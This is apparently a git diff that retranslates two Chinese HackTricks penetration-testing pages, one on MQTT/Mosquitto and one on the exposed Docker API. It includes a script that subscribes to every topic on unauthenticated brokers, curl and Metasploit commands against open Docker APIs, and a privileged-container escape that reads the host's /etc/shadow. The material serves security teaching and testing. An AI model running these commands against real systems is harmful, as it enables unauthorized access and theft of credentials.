* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

108
network-services-pentesting/1883-pentesting-mqtt-mosquitto.md
View file

@ -1,26 +1,27 @@
# 1883 - Pentesting MQTT (Mosquitto)
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary>Support HackTricks</summary>
支持HackTricks的其他方式
- 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
- 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
- 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
- **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
- 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
### [WhiteIntel](https://whiteintel.io)
<figure><img src="../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) 是一个由**暗网**支持的搜索引擎,提供免费功能,用于检查公司或其客户是否受到**窃取恶意软件**的**侵害**
[**WhiteIntel**](https://whiteintel.io) 是一个由 **暗网** 驱动的搜索引擎,提供 **免费** 功能以检查公司或其客户是否被 **窃取恶意软件** **入侵**
WhiteIntel的主要目标是打击由窃取信息的恶意软件导致的账户劫持和勒索软件攻击。
WhiteIntel 的主要目标是打击由于信息窃取恶意软件导致的账户接管和勒索软件攻击。
您可以访问他们的网站并免费尝试他们的引擎:
@ -30,18 +31,18 @@ WhiteIntel的主要目标是打击由窃取信息的恶意软件导致的账户
## 基本信息
**MQ Telemetry Transport (MQTT)** 被称为一种**发布/订阅消息传递协议**以其极端简单和轻量性著称。该协议专门为设备能力有限、在低带宽、高延迟或不稳定连接的网络上运行的环境而设计。MQTT的核心目标包括最小化网络带宽的使用和减少对设备资源的需求。此外,它旨在保持可靠的通信并提供一定程度的传递保证。这些目标使MQTT非常适用于蓬勃发展的**机器对机器M2M通信**和**物联网IoT**领域在这些领域中高效连接大量设备至关重要。此外MQTT对于移动应用程序也非常有益其中节省带宽和电池寿命至关重要。
**MQ 远程传输 (MQTT)** 被称为一种 **发布/订阅消息协议**以其极端的简单性和轻量性而著称。该协议专门为设备能力有限且在低带宽、高延迟或不可靠连接的网络上运行的环境量身定制。MQTT 的核心目标包括最小化网络带宽的使用和减少对设备资源的需求。此外,它旨在保持可靠的通信并提供一定程度的交付保证。这些目标使 MQTT 特别适合于蓬勃发展的 **机器对机器 (M2M) 通信****物联网 (IoT)** 领域在这些领域中高效连接大量设备至关重要。此外MQTT 对于移动应用程序也非常有利,因为节省带宽和电池寿命至关重要。
**默认端口:** 1883
```
PORT STATE SERVICE REASON
1883/tcp open mosquitto version 1.4.8 syn-ack
```
## 检查流量
## Inspecting the traffic
当 MQTT 代理收到 **CONNECT** 数据包时,会发送回一个 **CONNACK** 数据包。该数据包包含一个返回码,对于理解连接状态至关重要。返回码 **0x00** 表示凭据已被接受,表明连接成功。另一方面,返回**0x05** 表示凭据无效,从而阻止连接。
当 MQTT 代理收到 **CONNECT** 数据包时,会发送回 **CONNACK** 数据包。该数据包包含一个返回代码,这对于理解连接状态至关重要。返回代码 **0x00** 表示凭据已被接受,标志着连接成功。另一方面,返回代**0x05** 表示凭据无效,从而阻止连接。
例如,如果代理因凭据无效而拒绝连接,场景将如下所示:
例如,如果代理因凭据无效而拒绝连接,场景将如下所示:
```
{
"returnCode": "0x05",
@ -52,25 +53,25 @@ PORT STATE SERVICE REASON
### [**暴力破解 MQTT**](../generic-methodologies-and-resources/brute-force.md#mqtt)
## MQTT 渗透测试
## 渗透测试 MQTT
**身份验证完全是可选的**,即使正在执行身份验证,**默认情况下不使用加密**(凭据以明文形式发送)。仍然可以执行中间人攻击来窃取密码。
**身份验证是完全可选的**,即使正在进行身份验证,**默认情况下也不使用加密**(凭据以明文发送)。仍然可以执行 MITM 攻击以窃取密码。
要连接到 MQTT 服务,可以使用:[https://github.com/bapowell/python-mqtt-client-shell](https://github.com/bapowell/python-mqtt-client-shell) 并订阅所有主题:
要连接到 MQTT 服务,可以使用:[https://github.com/bapowell/python-mqtt-client-shell](https://github.com/bapowell/python-mqtt-client-shell) 并通过以下方式订阅所有主题:
```
> connect (NOTICE that you need to indicate before this the params of the connection, by default 127.0.0.1:1883)
> subscribe "#" 1
> subscribe "$SYS/#"
```
你也可以使用[**https://github.com/akamai-threat-research/mqtt-pwn**](https://github.com/akamai-threat-research/mqtt-pwn)
您还可以使用 [**https://github.com/akamai-threat-research/mqtt-pwn**](https://github.com/akamai-threat-research/mqtt-pwn)
你也可以使用:
您还可以使用:
```bash
apt-get install mosquitto mosquitto-clients
mosquitto_sub -t 'test/topic' -v #Subscribe to 'test/topic'
mosquitto_sub -h <host-ip> -t "#" -v #Subscribe to ALL topics.
```
或者你可以**运行这段代码尝试连接到一个没有身份验证的MQTT服务订阅每个主题并监听它们**
或者你可以**运行这段代码尝试连接到一个没有身份验证的MQTT服务订阅所有主题并监听它们**
```python
#This is a modified version of https://github.com/Warflop/IOT-MQTT-Exploit/blob/master/mqtt.py
import paho.mqtt.client as mqtt
@ -101,67 +102,68 @@ main()
```
## 更多信息
从这里获取:[https://morphuslabs.com/hacking-the-iot-with-mqtt-8edaf0d07b9b](https://morphuslabs.com/hacking-the-iot-with-mqtt-8edaf0d07b9b)
来自这里: [https://morphuslabs.com/hacking-the-iot-with-mqtt-8edaf0d07b9b](https://morphuslabs.com/hacking-the-iot-with-mqtt-8edaf0d07b9b)
### 发布/订阅模式 <a href="#b667" id="b667"></a>
发布/订阅模型由以下组成:
发布/订阅模型由以下部分组成:
- **发布者**:向代理发布消息到一个(或多个)主题
- **订阅者**:订阅一个(或多个)主题在代理中,并接收所有从发布者发送的消息。
- **代理**:将所有来自发布者的消息路由到订阅者。
- **主题**由一个或多个级别组成,级别之间用斜杠分隔(例如,/smartshouse/livingroom/temperature
* **发布者**: 向代理中的一个(或多个)主题发布消息
* **订阅者**: 订阅代理中的一个(或多个)主题,并接收来自发布者的所有消息。
* **代理**: 将所有消息从发布者路由到订阅者。
* **主题**: 由一个或多个级别组成,级别之间用斜杠分隔(例如,/smartshouse/livingroom/temperature
### 数据包格式 <a href="#f15a" id="f15a"></a>
每个 MQTT 数据包包含一个固定头部(图 02。图 02固定头部
每个MQTT数据包包含一个固定头部图02。图02: 固定头部
![https://miro.medium.com/max/838/1\*k6RkAHEk0576geQGUcKSTA.png](https://miro.medium.com/max/838/1\*k6RkAHEk0576geQGUcKSTA.png)
### 数据包类型
- CONNECT1由客户端发起请求与服务器建立连接。
- CONNACK2服务器对成功连接的确认。
- PUBLISH3用于在客户端和服务器之间发送消息
- PUBACK4对 PUBLISH 数据包的确认。
- PUBREC5消息传递协议的一部分确保消息已接收。
- PUBREL6进一步确保消息传递,指示消息释放。
- PUBCOMP7消息传递协议的最后部分,指示完成。
- SUBSCRIBE8客户端请求从一个主题接收消息。
- SUBACK9服务器对 SUBSCRIBE 请求的确认。
- UNSUBSCRIBE10客户端请求停止从一个主题接收消息。
- UNSUBACK11服务器对 UNSUBSCRIBE 请求的响应。
- PINGREQ12客户端发送的心跳消息。
- PINGRESP13服务器对心跳消息的响应。
- DISCONNECT14由客户端发起终止连接。
- 两个值0 和 15被标记为保留禁止使用
* CONNECT (1): 由客户端发起以请求与服务器的连接。
* CONNACK (2): 服务器对成功连接的确认。
* PUBLISH (3): 用于从客户端向服务器发送消息或反之亦然
* PUBACK (4): 对PUBLISH数据包的确认。
* PUBREC (5): 消息传递协议的一部分,确保消息已被接收。
* PUBREL (6): 进一步确保消息传递,指示消息释放。
* PUBCOMP (7): 消息传递协议的最后部分,指示完成。
* SUBSCRIBE (8): 客户端请求监听来自某个主题的消息。
* SUBACK (9): 服务器对SUBSCRIBE请求的确认。
* UNSUBSCRIBE (10): 客户端请求停止接收来自某个主题的消息。
* UNSUBACK (11): 服务器对UNSUBSCRIBE请求的响应。
* PINGREQ (12): 客户端发送的心跳消息。
* PINGRESP (13): 服务器对心跳消息的响应。
* DISCONNECT (14): 由客户端发起以终止连接。
* 两个值0和15被标记为保留其使用是禁止的
## Shodan
- `port:1883 MQTT`
* `port:1883 MQTT`
### [WhiteIntel](https://whiteintel.io)
<figure><img src="../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) 是一个由**暗网**推动的搜索引擎,提供**免费**功能,用于检查公司或其客户是否受到**窃取恶意软件**的**损害**
[**WhiteIntel**](https://whiteintel.io) 是一个由 **暗网** 驱动的搜索引擎,提供 **免费** 功能以检查公司或其客户是否被 **窃取恶意软件** **入侵**
WhiteIntel 的主要目标是打击由窃取信息的恶意软件导致的账户劫持和勒索软件攻击。
WhiteIntel的主要目标是打击由于信息窃取恶意软件导致的账户接管和勒索软件攻击。
您可以访问他们的网站并免费尝试他们的引擎:
{% embed url="https://whiteintel.io" %}
{% hint style="success" %}
学习和实践AWS黑客技术<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks培训AWS红队专家ARTE**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践GCP黑客技术<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks培训GCP红队专家GRTE**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
<summary>支持HackTricks</summary>
支持 HackTricks 的其他方式:
- 如果您想在 HackTricks 中看到您的**公司广告**或**下载 PDF 版本的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
- 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
- 发现[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家 [**NFTs**](https://opensea.io/collection/the-peass-family)
- **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** 上关注我们**。
- 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* 查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**电报群组**](https://t.me/peass)或**在** **Twitter** 🐦 **上关注我们** [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github库提交PR分享黑客技巧。
</details>
{% endhint %}

153
network-services-pentesting/2375-pentesting-docker.md
View file

@ -1,26 +1,27 @@
# 2375, 2376 Pentesting Docker
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中被广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}
### [WhiteIntel](https://whiteintel.io)
<figure><img src="../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) 是一个由**暗网**支持的搜索引擎,提供免费功能,用于检查公司或其客户是否受到**窃取恶意软件**的**侵害**
[**WhiteIntel**](https://whiteintel.io) 是一个由 **暗网** 驱动的搜索引擎,提供 **免费** 功能以检查公司或其客户是否被 **窃取恶意软件** **入侵**
WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫持和勒索软件攻击。
WhiteIntel 的主要目标是打击由于信息窃取恶意软件导致的账户接管和勒索软件攻击。
您可以访问他们的网站并免费尝试他们的引擎:
@ -28,19 +29,19 @@ WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫
***
### Docker基础知识
### Docker 基础
#### 什么是Docker
#### 什么是
Docker是**容器化行业**中的**前沿平台**,引领**持续创新**。它促进了应用程序的轻松创建和分发,涵盖**传统到未来**的范围,并确保它们在不同环境中的**安全部署**
Docker**容器化行业****前沿平台**,引领着 **持续创新**。它使得应用程序的创建和分发变得轻而易举,涵盖从 **传统到未来** 的应用,并确保它们在不同环境中的 **安全部署**
#### 基本的Docker架构
#### 基本 Docker 架构
* [**containerd**](http://containerd.io):这是容器的**核心运行时**,负责全面**管理容器的生命周期**。这包括处理**镜像传输和存储**,并监视和管理容器的**执行、监控和网络**。对containerd的**更详细见解**将**进一步探讨**
* **container-shim**在处理**无头容器**时发挥关键作用,它在容器初始化后无缝接管**runc**的工作。
* [**runc**](http://runc.io)以其**轻量级和通用容器运行时**功能而闻名runc符合**OCI标准**。它由containerd用于根据**OCI指南**启动和管理容器,从最初的**libcontainer**发展而来。
* [**grpc**](http://www.grpc.io)对于容器d和**docker-engine**之间的通信至关重要,确保**高效的交互**
* [**OCI**](https://www.opencontainers.org)在维护运行时和镜像的**OCI规范**方面起着关键作用最新的Docker版本符合**OCI镜像和运行时**标准。
* [**containerd**](http://containerd.io):这是一个 **核心运行时**,负责容器的全面 **生命周期管理**。这包括处理 **镜像传输和存储**,以及监督容器的 **执行、监控和网络**。关于 containerd 的 **更详细见解** 将在后续探讨
* **container-shim** 在处理 **无头容器** 时扮演着关键角色,顺利接管 **runc** 初始化后的工作。
* [**runc**](http://runc.io)因其 **轻量级和通用的容器运行时** 能力而受到推崇runc 符合 **OCI 标准**。它被 containerd 用于根据 **OCI 指南** **启动和管理容器**,并从最初的 **libcontainer** 发展而来。
* [**grpc**](http://www.grpc.io) 对于 **促进 containerd 和 docker-engine 之间的通信** 至关重要,确保 **高效交互**
* [**OCI**](https://www.opencontainers.org) 在维护 **运行时和镜像的 OCI 规范** 中发挥着关键作用,最新的 Docker 版本符合 **OCI 镜像和运行时** 标准。
#### 基本命令
```bash
@ -67,11 +68,11 @@ docker system prune -a
```
#### Containerd
**Containerd**是专门为像**Docker和Kubernetes**等容器平台开发的。它旨在通过抽象操作系统特定功能和系统调用简化在各种操作系统包括Linux、Windows、Solaris等上执行容器的过程。Containerd的目标是仅包含其用户所需的基本功能力求省略不必要的组件。然而,完全实现这一目标被认为是具有挑战性的。
**Containerd** 是专门为满足 **Docker 和 Kubernetes** 等容器平台的需求而开发的。它旨在通过抽象操作系统特定的功能和系统调用,**简化在各种操作系统上执行容器** 的过程,包括 Linux、Windows、Solaris 等。Containerd 的目标是仅包含用户所需的基本功能,努力省略不必要的组件。然而,完全实现这一目标被认为是具有挑战性的。
一个关键的设计决定是**Containerd不处理网络**。网络被认为是分布式系统中的关键元素具有诸如软件定义网络SDN和服务发现等复杂性这些复杂性在不同平台之间差异很大。因此Containerd将网络方面的处理留给了它支持的平台来管理
一个关键的设计决策是 **Containerd 不处理网络**。网络被视为分布式系统中的一个关键元素,具有软件定义网络 (SDN) 和服务发现等复杂性这些复杂性在不同平台之间差异显著。因此Containerd 将网络方面的管理留给它所支持的平台
虽然**Docker利用Containerd**来运行容器但重要的是要注意Containerd仅支持Docker功能的子集。具体来说Containerd缺乏Docker中存在的网络管理功能并且不直接支持创建Docker swarms。这种区别突显了Containerd作为容器运行时环境的专注角色将更专业的功能委托给其集成的平台。
虽然 **Docker 利用 Containerd** 来运行容器,但重要的是要注意 Containerd 仅支持 Docker 功能的一个子集。具体而言Containerd 缺乏 Docker 中存在的网络管理能力,并且不支持直接创建 Docker swarm。这一区别突显了 Containerd 作为容器运行时环境的专注角色,将更专业的功能委托给它所集成的平台。
```bash
#Containerd CLI
ctr images pull --skip-verify --plain-http registry:5000/alpine:latest #Get image
@ -89,20 +90,20 @@ ctr container delete <containerName>
```
#### Podman
**Podman** 是一个遵循[Open Container Initiative (OCI) 标准](https://github.com/opencontainers)的开源容器引擎,由 Red Hat 开发和维护。它与 Docker 有几个明显的特点不同,尤其是其**无守护程序架构**和对**无 root 权限容器**的支持,使用户能够在无需 root 权限的情况下运行容器。
**Podman** 是一个遵循 [Open Container Initiative (OCI) 标准](https://github.com/opencontainers) 的开源容器引擎,由 Red Hat 开发和维护。它与 Docker 的不同之处在于几个独特的特性,特别是它的 **无守护进程架构** 和对 **无根容器** 的支持,使用户能够在没有根权限的情况下运行容器。
Podman 的设计旨在与 Docker 的 API 兼容,允许使用 Docker CLI 命令。这种兼容性延伸到其生态系统,其中包括诸如**Buildah**用于构建容器镜像和**Skopeo**用于推送、拉取和检查镜像等操作的工具。有关这些工具的更多详细信息,请访问它们的[GitHub 页面](https://github.com/containers/buildah/tree/master/docs/containertools)。
Podman 旨在与 Docker 的 API 兼容,允许使用 Docker CLI 命令。这种兼容性扩展到其生态系统,包括用于构建容器镜像的工具 **Buildah** 和用于图像操作(如推送、拉取和检查)的 **Skopeo**。有关这些工具的更多详细信息,请访问它们的 [GitHub 页面](https://github.com/containers/buildah/tree/master/docs/containertools)。
**主要区别**
- **架构**:与 Docker 的客户端-服务器模型不同Podman 在没有守护程的情况下运行。这种设计意味着容器以启动它们的用户的权限运行,通过消除对 root 访问的需求来增强安全性。
- **Systemd 集成**Podman 与 **systemd** 集成以管理容器,允许通过 systemd 单元进行容器管理。这与 Docker 主要用于管理 Docker 守护程序进程的 systemd 的用法形成对比。
- **无 root 权限容器**Podman 的一个关键特点是其能够以启动用户的权限运行容器。这种方法通过确保攻击者仅获得受损用户的权限而不是 root 访问权限,最小化了与容器入侵相关的风险。
* **架构**:与 Docker 的客户端-服务器模型和后台守护进程不同Podman 在没有守护程的情况下运行。这种设计意味着容器以启动它们的用户的权限运行,通过消除对访问的需求来增强安全性。
* **Systemd 集成**Podman 与 **systemd** 集成以管理容器,允许通过 systemd 单元进行容器管理。这与 Docker 主要用于管理 Docker 守护进程的 systemd 使用形成对比。
* **无根容器**Podman 的一个关键特性是能够在发起用户的权限下运行容器。这种方法通过确保攻击者仅获得被攻陷用户的权限,而不是根访问,来最小化与容器漏洞相关的风险。
Podman 的方法为 Docker 提供了一个安全灵活的替代方案,强调用户权限管理和与现有 Docker 工作流的兼容性。
Podman 的方法提供了一个安全灵活的 Docker 替代方案,强调用户权限管理和与现有 Docker 工作流的兼容性。
{% hint style="info" %}
请注意,由于 Podman 旨在支持与 Docker 相同的 API因此您可以像在 Docker 中一样使用 Podman例如
注意,由于 podman 旨在支持与 docker 相同的 API您可以使用与 docker 相同的命令来使用 podman例如
```bash
podman --version
podman info
@ -112,18 +113,19 @@ podman ls
{% endhint %}
### 基本信息
远程 API 在启用时默认在 2375 端口上运行。默认情况下,该服务不需要身份验证,允许攻击者启动特权 docker 容器。通过使用远程 API可以将主机/(根目录)附加到容器,并读取/写入主机环境中的文件。
**默认端口:** 2375
默认情况下,当启用时,远程 API 在 2375 端口上运行。该服务默认不需要身份验证,这使得攻击者能够启动特权 docker 容器。通过使用远程 API可以将主机 /(根目录)附加到容器,并读取/写入主机环境的文件。
**默认端口:** 2375
```
PORT STATE SERVICE
2375/tcp open docker
```
### 枚举
### Enumeration
#### 手动
#### Manual
请注意,要枚举docker API您可以使用`docker`命令或`curl`,就像以下示例中所示:
请注意,为了枚举 docker API您可以使用 `docker` 命令或 `curl`,如以下示例所示:
```bash
#Using curl
curl -s http://open.docker.socket:2375/version | jq #Get version
@ -159,19 +161,19 @@ docker-init:
Version: 0.18.0
GitCommit: fec3683
```
如果你可以使用`docker`命令**联系远程docker API**,你可以**执行**任何在[**之前评论过的docker命令**](2375-pentesting-docker.md#basic-commands)来与服务进行交互。
如果您可以 **使用 `docker` 命令联系远程 docker API**,您可以 **执行** 任何 **之前评论过的** [**docker** 命令](2375-pentesting-docker.md#basic-commands) 来与服务进行交互。
{% hint style="info" %}
你可以`export DOCKER_HOST="tcp://localhost:2375"`**避免**在docker命令中使用`-H`参数
您可以 `export DOCKER_HOST="tcp://localhost:2375"`**避免** 在 docker 命令中使用 `-H` 参数
{% endhint %}
**快速权**
**快速权限提升**
```bash
docker run -it -v /:/host/ ubuntu:latest chroot /host/ bash
```
**Curl**
有时你会看到 **2376** 端口开放在 **TLS** 端点上。我无法使用 docker 客户端连接到它,但可以使用 curl 进行连接。
有时你会看到 **2376** 用于 **TLS** 端点。我无法通过 docker 客户端连接到它,但可以使用 curl 进行连接。
```bash
#List containers
curl insecure https://tlsopen.docker.socket:2376/containers/json | jq
@ -201,94 +203,94 @@ curl insecure -vv -X POST -H "Content-Type: application/json" https://tls-ope
#Delete stopped containers
curl insecure -vv -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/prune
```
如果您想获取更多信息,请访问我复制命令的地方[https://securityboulevard.com/2019/02/abusing-docker-api-socket/](https://securityboulevard.com/2019/02/abusing-docker-api-socket/)
如果您想要更多信息,可以在我复制命令的地方找到更多信息[https://securityboulevard.com/2019/02/abusing-docker-api-socket/](https://securityboulevard.com/2019/02/abusing-docker-api-socket/)
#### 自动
#### 自动
```bash
msf> use exploit/linux/http/docker_daemon_tcp
nmap -sV --script "docker-*" -p <PORT> <IP>
```
### Compromising
### 破坏
在以下页面,您可以找到**从 Docker 容器中逃逸**的方法:
在以下页面中,您可以找到**从docker容器中逃脱**的方法:
{% content-ref url="../linux-hardening/privilege-escalation/docker-security/" %}
[docker-security](../linux-hardening/privilege-escalation/docker-security/)
{% endcontent-ref %}
滥用这一点,可以从容器中逃逸,您可以在远程机器上运行一个弱容器,从中逃逸,并妥协该机器:
利用这一点,可以从容器中逃脱,您可以在远程机器上运行一个弱容器,从中逃脱并破坏该机器:
```bash
docker -H <host>:2375 run --rm -it --privileged --net=host -v /:/mnt alpine
cat /mnt/etc/shadow
```
* [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CVE%20Exploits/Docker%20API%20RCE.py](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CVE%20Exploits/Docker%20API%20RCE.py)
###
### 权限提升
如果您在使用 Docker 的主机内部,您可以[**阅读此信息尝试提升权限**](../linux-hardening/privilege-escalation/#writable-docker-socket)。
如果您在使用 docker 的主机内部,您可以 [**阅读此信息以尝试提升权限**](../linux-hardening/privilege-escalation/#writable-docker-socket)。
### 在运行的 Docker 容器中发现秘密
```bash
docker ps [| grep <kubernetes_service_name>]
docker inspect <docker_id>
```
检查 **env**(环境变量部分)以查找秘密信息,你可能会发现:
检查 **env**(环境变量部分)以查找秘密,您可能会发现:
* 密码。
* IP 地址。
* 端口。
* 路径。
* 其他… .
* 其他……。
如果你想提取一个文件:
如果您想提取文件:
```bash
docker cp <docket_id>:/etc/<secret_01> <secret_01>
```
### 保护您的Docker
### Securing your Docker
#### 保护Docker安装和使用
#### Securing Docker installation and usage
* 您可以使用工具[https://github.com/docker/docker-bench-security](https://github.com/docker/docker-bench-security)来检查您当前的Docker安装。
* 您可以使用工具 [https://github.com/docker/docker-bench-security](https://github.com/docker/docker-bench-security) 来检查您当前的 Docker 安装。
* `./docker-bench-security.sh`
* 您可以使用工具[https://github.com/kost/dockscan](https://github.com/kost/dockscan)来检查您当前的Docker安装。
* 您可以使用工具 [https://github.com/kost/dockscan](https://github.com/kost/dockscan) 来检查您当前的 Docker 安装。
* `dockscan -v unix:///var/run/docker.sock`
* 您可以使用工具[https://github.com/genuinetools/amicontained](https://github.com/genuinetools/amicontained)来查看在不同安全选项下运行时容器将具有的权限。这对于了解使用某些安全选项运行容器的影响很有用:
* 您可以使用工具 [https://github.com/genuinetools/amicontained](https://github.com/genuinetools/amicontained) 来检查容器在不同安全选项下的权限。这对于了解使用某些安全选项运行容器的影响非常有用:
* `docker run --rm -it r.j3ss.co/amicontained`
* `docker run --rm -it --pid host r.j3ss.co/amicontained`
* `docker run --rm -it --security-opt "apparmor=unconfined" r.j3ss.co/amicontained`
#### 保护Docker镜像
#### Securing Docker Images
* 您可以使用[https://github.com/quay/clair](https://github.com/quay/clair)的Docker镜像来扫描您的其他Docker镜像并查找漏洞。
* 您可以使用 [https://github.com/quay/clair](https://github.com/quay/clair) Docker 镜像来扫描您的其他 Docker 镜像并查找漏洞。
* `docker run --rm -v /root/clair_config/:/config -p 6060-6061:6060-6061 -d clair -config="/config/config.yaml"`
* `clair-scanner -c http://172.17.0.3:6060 --ip 172.17.0.1 ubuntu-image`
#### 保护Dockerfiles
#### Securing Dockerfiles
* 您可以使用工具[https://github.com/buddy-works/dockerfile-linter](https://github.com/buddy-works/dockerfile-linter)来**检查您的Dockerfile**并找到各种配置错误。每个配置错误都将被赋予一个ID您可以在这里找到如何修复每个错误[https://github.com/buddy-works/dockerfile-linter/blob/master/Rules.md](https://github.com/buddy-works/dockerfile-linter/blob/master/Rules.md)。
* 您可以使用工具 [https://github.com/buddy-works/dockerfile-linter](https://github.com/buddy-works/dockerfile-linter) 来 **检查您的 Dockerfile** 并查找各种错误配置。每个错误配置将被分配一个 ID您可以在这里找到 [https://github.com/buddy-works/dockerfile-linter/blob/master/Rules.md](https://github.com/buddy-works/dockerfile-linter/blob/master/Rules.md) 如何修复它们
* `dockerfilelinter -f Dockerfile`
![](<../.gitbook/assets/image (176).png>)
* 您可以使用工具[https://github.com/replicatedhq/dockerfilelint](https://github.com/replicatedhq/dockerfilelint)来**检查您的Dockerfile**并找各种配置错误
